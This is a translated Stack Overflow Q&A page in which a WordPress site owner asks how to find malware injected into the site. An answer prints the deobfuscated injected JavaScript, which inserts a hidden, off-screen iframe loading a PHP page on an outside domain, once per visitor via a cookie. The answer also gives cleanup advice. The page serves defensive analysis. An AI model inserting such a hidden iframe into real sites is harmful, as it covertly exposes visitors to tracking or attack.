那些遇到过的问题

如何在网站上找到恶意代码/恶意软件

Pec*_*tum 8 html php wordpress malware

我的Wordpress网站最近被恶意软件感染,并被列入黑名单.我以为我通过更新网站和插件并删除任何我无法识别的代码来修复它.

然后我使用了Sucuri Site Checker,看起来没问题,所以我向Google提交了一份评论请求.但是,Google表示它仍然包含恶意代码形式的恶意软件(他们称之为代码注入).

我有点迷失了该做什么.有没有办法找到谷歌找到的代码?该域名是sudorf.co.uk但它有恶意软件所以我不建议去那里 - 不知道恶意软件会做什么.

任何帮助将不胜感激.

编辑:我几天前找到了代码并删除了它,然后我更新了所有版本等.但显然它又回来了.有没有人知道如何到达那里.我的想法是它来自一个插件 - 这就是为什么我要删除所有这些.另一个是联系表单 - 但我不认为这会让他们编辑header.php.

h2o*_*ooo 8

这是纯粹的信息.当它被去混淆时,您的恶意软件看起来像这样:

 function k09() {
     var static = 'ajax';
     var controller = 'index.php';
     var k = document.createElement('iframe');

     k.src = 'http://dostojewskij-gesellschaft.de/VD49Jdzr.php';
     k.style.position = 'absolute';
     k.style.color = '512';
     k.style.height = '512px';
     k.style.width = '512px';
     k.style.left = '1000512';
     k.style.top = '1000512';

     if (!document.getElementById('k')) {
         document.write('<p id=\'k\' class=\'k09\' ></p>');
         document.getElementById('k').appendChild(k);
     }
 }

 function SetCookie(cookieName, cookieValue, nDays, path) {
     var today = new Date();
     var expire = new Date();
     if (nDays == null || nDays == 0) nDays = 1;
     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
     document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
 }

 function GetCookie(name) {
     var start = document.cookie.indexOf(name + "=");
     var len = start + name.length + 1;
     if ((!start) &&
         (name != document.cookie.substring(0, name.length))) {
         return null;
     }
     if (start == -1) return null;
     var end = document.cookie.indexOf(";", len);
     if (end == -1) end = document.cookie.length;
     return unescape(document.cookie.substring(len, end));
 }
 if (navigator.cookieEnabled) {
     if (GetCookie('visited_uq') == 55) {} else {
         SetCookie('visited_uq', '55', '1', '/');

         k09();
     }
 }
Run Code Online (Sandbox Code Playgroud)

http://dostojewskij-gesellschaft.de/VD49Jdzr.php 只需输出"OK".

为什么?

我的猜测是这是一个IP /流量记录器.也许黑客可以检查哪些博客最活跃,然后又回来破解那个特定网站(不需要浪费时间在每月有2位访问者的网站上).这是好事还是坏事.

好的部分是它们似乎没有使用任何用户数据库或其他任何东西.

糟糕的是,他们很可能已经下载了整个数据库,因为他们显然已经在您的服务器上拥有执行权限,并且可能已将他们的PHP文件放在您的服务器上.你最好的选择是开始一个新的WP并逐个复制插件/主题,同时手动检查它们.

更改所有密码.甚至你的数据库登录.考虑妥协的一切.

归档时间:

查看次数:

2990 次

最近记录:

12 年,5 月 前
相关归档
我可以多次使用CURLOPT_HTTPHEADER调用curl_setopt来设置多个标头吗? 66
如何查看选中的复选框? 46
使用 Tailwind CSS 创建包含文本的水平线 (HR) 分隔线 28
在水平滚动中修复列 27
如何调整大svg的大小以适应div 20
两个php数组 - 使用另一个数组的值排序一个数组 7
在wordpress中检测主页有哪些不同的方法? 7
Wordpress:"插入阅读更多标签"的工作原理如何? 6
部分退款如何存储在WooCommerce数据库中? 6
取消设置宽度以恢复为内联html属性“ width = XX” 5
难疑归档
什么是Python中的元类? 5409
什么是三法则? 2067
静态类变量是否可能? 1824
为什么在C++中读取stdin的行比Python要慢得多? 1738
JavaScript中的'new'关键字是什么? 1684
如何为项目中的单个文件禁用ARC? 1332
如何将字节数组转换为十六进制字符串,反之亦然? 1313
如何撤消"git commit --amend"而不是"git commit" 1198
如何获取Android应用程序的构建版本号? 1198
将标签重新定义为4个空格 1041